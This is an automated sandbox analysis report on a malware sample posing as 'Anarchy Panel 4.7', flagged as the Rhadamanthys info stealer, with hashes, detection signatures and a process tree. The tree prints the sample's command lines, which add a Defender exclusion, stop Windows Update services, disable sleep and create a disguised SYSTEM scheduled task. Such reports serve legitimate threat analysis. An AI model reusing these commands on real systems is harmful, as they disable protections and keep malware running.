Overview
Analysis
- max time kernel: 1800s
- max time network: 1149s
- platform: windows10-2004_x64
- resource: win10v2004-20230703-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20230703-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 19-07-2023 00:36
Behavioral tasks (sample, resource)
- behavioral1: Anarchy Panel 4.7/Anarchy Panel.exe, win7-20230712-en
- behavioral2: Anarchy Panel 4.7/Anarchy Panel.exe, win10v2004-20230703-en
- behavioral3: Anarchy Panel 4.7/Anarchy Panel.exe.xml, win7-20230712-en
- behavioral4: Anarchy Panel 4.7/Anarchy Panel.exe.xml, win10v2004-20230703-en
- behavioral5: Anarchy Panel 4.7/Plugins/0guo3zbo66fqoG.dll, win7-20230712-en
- behavioral6: Anarchy Panel 4.7/Plugins/0guo3zbo66fqoG.dll, win10v2004-20230703-en
- behavioral7: Anarchy Panel 4.7/Plugins/59Zp7paEHDF7luJ.dll, win7-20230712-en
- behavioral8: Anarchy Panel 4.7/Plugins/59Zp7paEHDF7luJ.dll, win10v2004-20230703-en
- behavioral9: Anarchy Panel 4.7/Plugins/CjETR6GpGXqM.dll, win7-20230712-en
- behavioral10: Anarchy Panel 4.7/Plugins/CjETR6GpGXqM.dll, win10v2004-20230703-en
- behavioral11: Anarchy Panel 4.7/Plugins/EVa7gBMKoaHmLC.dll, win7-20230712-en
- behavioral12: Anarchy Panel 4.7/Plugins/EVa7gBMKoaHmLC.dll, win10v2004-20230703-en
- behavioral13: Anarchy Panel 4.7/Plugins/FBSyChwp.dll, win7-20230712-en
- behavioral14: Anarchy Panel 4.7/Plugins/FBSyChwp.dll, win10v2004-20230703-en
- behavioral15: Anarchy Panel 4.7/Plugins/G3nl0mDcABnDuZ.dll, win7-20230712-en
- behavioral16: Anarchy Panel 4.7/Plugins/G3nl0mDcABnDuZ.dll, win10v2004-20230703-en
- behavioral17: Anarchy Panel 4.7/Plugins/KNTmoSnG.dll, win7-20230712-en
- behavioral18: Anarchy Panel 4.7/Plugins/KNTmoSnG.dll, win10v2004-20230703-en
- behavioral19: Anarchy Panel 4.7/Plugins/PK0TcnqTGFagQTS.dll, win7-20230712-en
- behavioral20: Anarchy Panel 4.7/Plugins/PK0TcnqTGFagQTS.dll, win10v2004-20230703-en
- behavioral21: Anarchy Panel 4.7/Plugins/RssCnLKcGRxj.dll, win7-20230712-en
- behavioral22: Anarchy Panel 4.7/Plugins/RssCnLKcGRxj.dll, win10v2004-20230703-en
- behavioral23: Anarchy Panel 4.7/Plugins/WkUP83aP9CABpi.dll, win7-20230712-en
- behavioral24: Anarchy Panel 4.7/Plugins/WkUP83aP9CABpi.dll, win10v2004-20230703-en
- behavioral25: Anarchy Panel 4.7/Plugins/eMTYbTz0gueNs4.dll, win7-20230712-en
- behavioral26: Anarchy Panel 4.7/Plugins/eMTYbTz0gueNs4.dll, win10v2004-20230703-en
- behavioral27: Anarchy Panel 4.7/Plugins/fzAgyDYa.dll, win7-20230712-en
- behavioral28: Anarchy Panel 4.7/Plugins/fzAgyDYa.dll, win10v2004-20230703-en
- behavioral29: Anarchy Panel 4.7/Plugins/mGWHaG2Jn.dll, win7-20230712-en
- behavioral30: Anarchy Panel 4.7/Plugins/mGWHaG2Jn.dll, win10v2004-20230703-en
- behavioral31: Anarchy Panel 4.7/Plugins/mML6WKMqdxjDGA.dll, win7-20230712-en
- behavioral32: Anarchy Panel 4.7/Plugins/mML6WKMqdxjDGA.dll, win10v2004-20230703-en
General
- Target: Anarchy Panel 4.7/Anarchy Panel.exe
- Size: 72KB
- MD5: 462b459a2560b65a657cfecce53d682a
- SHA1: f0ce24faf42d2d1453c4f18fda0223b83486e5ae
- SHA256: 00502647989c700d1cbf37685fcdf3a81d9302fb792edabecb5a211c5cdff0db
- SHA512: 5d88eb5c91dd772d0c6f54e5d799639e1fd59d4dcf112674d065b76bb3ab048442cccc13f2f031f611b9632a223c961c7ad43f09a06b33d2f92adec7da9ff88b
- SSDEEP: 384:5LerIjR+/cuFQ5r4NVX+oH38/1qmrc42mMPR45YHU/0/8IpzXePdCjiCNxKerWiV:nsUuFf

Malware Config
- Extracted: https://pastebin.com/raw/p2s7tDSd
Signatures
- Detect rhadamanthys stealer shellcode (6 IoCs)
  Memory dumps matched by YARA rule family_rhadamanthys (resource | yara_rule):
  behavioral2/memory/448-217-0x0000000002230000-0x0000000002630000-memory.dmp | family_rhadamanthys
  behavioral2/memory/448-218-0x0000000002230000-0x0000000002630000-memory.dmp | family_rhadamanthys
  behavioral2/memory/448-221-0x0000000002230000-0x0000000002630000-memory.dmp | family_rhadamanthys
  behavioral2/memory/448-223-0x0000000002230000-0x0000000002630000-memory.dmp | family_rhadamanthys
  behavioral2/memory/448-286-0x0000000002230000-0x0000000002630000-memory.dmp | family_rhadamanthys
  behavioral2/memory/448-319-0x0000000002230000-0x0000000002630000-memory.dmp | family_rhadamanthys
- Rhadamanthys
  Rhadamanthys is an info stealer written in C++, first seen in August 2022.
- Suspicious use of NtCreateUserProcessOtherParentProcess (6 IoCs)
  Processes (description | pid | process | target process):
  PID 4860 created 3156 | 4860 | aqcorpk2.zlc1.exe | Explorer.EXE (5 identical entries)
  PID 448 created 3156 | 448 | aqcorpk2.zlc2.exe | Explorer.EXE
- Blocklisted process makes network request (2 IoCs)
  Processes (flow | pid | process):
  19 | 4632 | powershell.exe
  21 | 4632 | powershell.exe
- Downloads MZ/PE file
- Drops file in Drivers directory (1 IoC)
  Processes (description | ioc | process):
  File created | C:\Windows\System32\drivers\etc\hosts | aqcorpk2.zlc1.exe
- Stops running service(s) (3 TTPs)
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely a geofence.
  Processes (description | ioc | process):
  Key value queried | \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\International\Geo\Nation | Anarchy Panel.exe
- Executes dropped EXE (4 IoCs)
  Processes (pid | process):
  2240 | aqcorpk2.zlc0.exe
  4860 | aqcorpk2.zlc1.exe
  448 | aqcorpk2.zlc2.exe
  2376 | aqcorpk2.zlc3.exe
- Adds Run key to start application (2 TTPs, 2 IoCs)
  Processes (description | ioc | process):
  Key created | \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Software\Microsoft\Windows\CurrentVersion\Run | aqcorpk2.zlc0.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsHostProcessor = "\"C:\\Users\\Admin\\AppData\\Roaming\\WindowsHostProcessor\\WindowsHostProcessor.exe\" " | aqcorpk2.zlc0.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTP)
- Suspicious use of SetThreadContext (1 IoC)
  Processes (description | pid | process | target process):
  PID 4860 set thread context of 4456 | 4860 | aqcorpk2.zlc1.exe | dialer.exe
- Launches sc.exe (5 IoCs)
  sc.exe is a Windows utility to control services on the system.
  Processes (pid | process):
  3276 | sc.exe
  5004 | sc.exe
  3528 | sc.exe
  4164 | sc.exe
  4424 | sc.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Program crash (2 IoCs)
  Processes (pid | pid_target | process | target process):
  924 | 588 | WerFault.exe | winlogon.exe
  1896 | 316 | WerFault.exe | dwm.exe
- Suspicious behavior: EnumeratesProcesses (27 IoCs)
  Processes (pid | process | number of entries):
  4632 | powershell.exe | 2
  448 | aqcorpk2.zlc2.exe | 4
  4860 | aqcorpk2.zlc1.exe | 10
  2688 | powershell.exe | 2
  4456 | dialer.exe | 6
  2712 | powershell.exe | 3
- Suspicious behavior: LoadsDriver (64 IoCs)
  Processes (pid): 4828 3644 4900 672 4488 2772 4988 2516 3876 3684 2804 4964 4868 2080 2564 1052 3944 260 464 4852 3896 2928 2692 336 3768 3892 4060 1340 5088 1172 4544 5052 2768 4976 2812 1404 4016 3128 1400 4412 3152 1188 1660 4936 1164 3476 4664 3560 4144 4356 3508 1760 1664 4416 3148 3732 4012 4896 4892 628 3032 4520 3616 2168
- Suspicious use of AdjustPrivilegeToken (12 IoCs)
  Processes (description | pid | process):
  Token: SeDebugPrivilege | 4632 | powershell.exe
  Token: SeDebugPrivilege | 2688 | powershell.exe
  Token: SeDebugPrivilege | 4456 | dialer.exe
  Token: SeShutdownPrivilege | 1608 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 1608 | powercfg.exe
  Token: SeDebugPrivilege | 2712 | powershell.exe
  Token: SeShutdownPrivilege | 2296 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 2296 | powercfg.exe
  Token: SeShutdownPrivilege | 784 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 784 | powercfg.exe
  Token: SeShutdownPrivilege | 3524 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 3524 | powercfg.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (pid | process | target pid | target process | number of entries):
  3220 | Anarchy Panel.exe | 4632 | powershell.exe | 3
  4632 | powershell.exe | 2240 | aqcorpk2.zlc0.exe | 2
  4632 | powershell.exe | 4860 | aqcorpk2.zlc1.exe | 2
  4632 | powershell.exe | 448 | aqcorpk2.zlc2.exe | 3
  4632 | powershell.exe | 2376 | aqcorpk2.zlc3.exe | 3
  384 | cmd.exe | 3276 | sc.exe | 2
  384 | cmd.exe | 5004 | sc.exe | 2
  384 | cmd.exe | 3528 | sc.exe | 2
  384 | cmd.exe | 4164 | sc.exe | 2
  384 | cmd.exe | 4424 | sc.exe | 2
  4860 | aqcorpk2.zlc1.exe | 4456 | dialer.exe | 1
  5040 | cmd.exe | 1608 | powercfg.exe | 2
  5040 | cmd.exe | 2296 | powercfg.exe | 2
  5040 | cmd.exe | 784 | powercfg.exe | 2
  5040 | cmd.exe | 3524 | powercfg.exe | 2
  4456 | dialer.exe | 588 | winlogon.exe | 1
  4456 | dialer.exe | 676 | lsass.exe | 1
  4456 | dialer.exe | 952 | svchost.exe | 1
  4456 | dialer.exe | 316 | dwm.exe | 1
  4456 | dialer.exe | 436 | svchost.exe | 1
  4456 | dialer.exe | 752 | svchost.exe | 1
  4456 | dialer.exe | 1064 | svchost.exe | 1
  4456 | dialer.exe | 1092 | svchost.exe | 1
  4456 | dialer.exe | 1104 | svchost.exe | 1
  4456 | dialer.exe | 1180 | svchost.exe | 1
  676 | lsass.exe | 2432 | sysmon.exe | 18
  448 | aqcorpk2.zlc2.exe | 872 | certreq.exe | 4
Processes (tree; indentation shows parent/child nesting)
- C:\Windows\system32\lsass.exe (PID 676)
  Command line: C:\Windows\system32\lsass.exe
  Signatures: Suspicious use of WriteProcessMemory
- C:\Windows\system32\winlogon.exe (PID 588)
  Command line: winlogon.exe
  - C:\Windows\system32\dwm.exe (PID 316)
    Command line: "dwm.exe"
    - C:\Windows\system32\WerFault.exe (PID 1896)
      Command line: C:\Windows\system32\WerFault.exe -u -p 316 -s 3892
      Signatures: Program crash
  - C:\Windows\system32\WerFault.exe (PID 924)
    Command line: C:\Windows\system32\WerFault.exe -u -p 588 -s 764
    Signatures: Program crash
- C:\Windows\system32\svchost.exe (PID 952)
  Command line: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
- C:\Windows\system32\svchost.exe (PID 436)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
- C:\Windows\System32\svchost.exe (PID 752)
  Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
- C:\Windows\system32\svchost.exe (PID 1104)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
- C:\Windows\system32\svchost.exe (PID 1092)
  Command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
- C:\Windows\system32\svchost.exe (PID 1180)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
- C:\Windows\System32\svchost.exe (PID 1064)
  Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
- C:\Windows\sysmon.exe (PID 2432)
  Command line: C:\Windows\sysmon.exe
- C:\Windows\Explorer.EXE (PID 3156)
  Command line: C:\Windows\Explorer.EXE
  - C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe (PID 3220)
    Command line: "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe"
    Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 4632)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
      Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc0.exe (PID 2240)
        Command line: "C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc0.exe"
        Signatures: Executes dropped EXE; Adds Run key to start application
      - C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe (PID 4860)
        Command line: "C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe"
        Signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Drops file in Drivers directory; Executes dropped EXE; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
      - C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe (PID 448)
        Command line: "C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe"
        Signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
      - C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc3.exe (PID 2376)
        Command line: "C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc3.exe"
        Signatures: Executes dropped EXE
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2688)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\cmd.exe (PID 384)
    Command line: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\System32\sc.exe (PID 3276)
      Command line: sc stop UsoSvc
      Signatures: Launches sc.exe
    - C:\Windows\System32\sc.exe (PID 5004)
      Command line: sc stop WaaSMedicSvc
      Signatures: Launches sc.exe
    - C:\Windows\System32\sc.exe (PID 3528)
      Command line: sc stop wuauserv
      Signatures: Launches sc.exe
    - C:\Windows\System32\sc.exe (PID 4164)
      Command line: sc stop bits
      Signatures: Launches sc.exe
    - C:\Windows\System32\sc.exe (PID 4424)
      Command line: sc stop dosvc
      Signatures: Launches sc.exe
  - C:\Windows\System32\cmd.exe (PID 5040)
    Command line: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\System32\powercfg.exe (PID 1608)
      Command line: powercfg /x -hibernate-timeout-ac 0
      Signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\powercfg.exe (PID 2296)
      Command line: powercfg /x -hibernate-timeout-dc 0
      Signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\powercfg.exe (PID 784)
      Command line: powercfg /x -standby-timeout-ac 0
      Signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\powercfg.exe (PID 3524)
      Command line: powercfg /x -standby-timeout-dc 0
      Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\dialer.exe (PID 4456)
    Command line: C:\Windows\System32\dialer.exe
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2712)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fratkkd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineTCP' /tr '''C:\Program Files\Google\Chrome\updatestarter.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updatestarter.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineTCP' -User 'System' -RunLevel 'Highest' -Force; }
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\certreq.exe (PID 872)
    Command line: "C:\Windows\system32\certreq.exe"
- C:\Windows\system32\WerFault.exe (PID 4276)
  Command line: C:\Windows\system32\WerFault.exe -pss -s 428 -p 588 -ip 588
- C:\Windows\system32\WerFault.exe (PID 4960)
  Command line: C:\Windows\system32\WerFault.exe -pss -s 468 -p 316 -ip 316
- C:\Windows\system32\WerFault.exe (PID 4360)
  Command line: C:\Windows\system32\WerFault.exe -pss -s 528 -p 316 -ip 316
- C:\Windows\system32\svchost.exe (PID 1224)
  Command line: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
- C:\Windows\system32\sihost.exe (PID 4000)
  Command line: sihost.exe
- C:\Windows\system32\sihost.exe (PID 4712)
  Command line: sihost.exe
- C:\Windows\system32\sihost.exe (PID 2900)
  Command line: sihost.exe
- C:\Windows\system32\sihost.exe (PID 640)
  Command line: sihost.exe
- C:\Windows\system32\sihost.exe (PID 3276)
  Command line: sihost.exe
- C:\Windows\system32\sihost.exe (PID 4084)
  Command line: sihost.exe
Network
MITRE ATT&CK Enterprise v6
Downloads